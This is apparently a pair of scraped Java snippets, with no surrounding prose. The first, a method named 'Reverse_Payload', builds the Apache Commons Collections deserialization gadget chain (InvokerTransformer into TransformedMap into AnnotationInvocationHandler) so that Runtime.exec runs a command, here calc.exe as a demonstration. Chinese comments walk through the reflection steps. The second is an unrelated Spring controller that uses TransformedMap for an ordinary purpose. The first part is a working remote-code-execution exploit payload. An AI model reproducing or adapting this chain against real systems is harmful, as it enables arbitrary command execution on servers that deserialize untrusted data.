public static Object Reverse_Payload() throws Exception { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})}; Transformer transformerChain = new ChainedTransformer(transformers); Map pocMap = new HashMap(); pocMap.put("value", "value"); Map outmap = TransformedMap.decorate(pocMap, null, transformerChain); //通过反射获得AnnotationInvocationHandler类对象 Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); //通过反射获得cls的构造函数 Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class); //这里需要设置Accessible为true,否则序列化失败 ctor.setAccessible(true); //通过newInstance()方法实例化对象 Object instance = ctor.newInstance(Retention.class, outmap); return instance; }
@RequestMapping(value = "/programs.htm", method = RequestMethod.GET) public String programs(final Model model) { final List<Meta> knownClasses = executionService.getKnownClasses(); final Map map = TransformedMap.decorate(new MultiValueMap(), TransformerUtils.invokerTransformer("getProgram"), TransformerUtils.nopTransformer()); for (final Meta meta : knownClasses) { map.put(meta, meta); } model.addAttribute("programmap", map); return "programs"; }
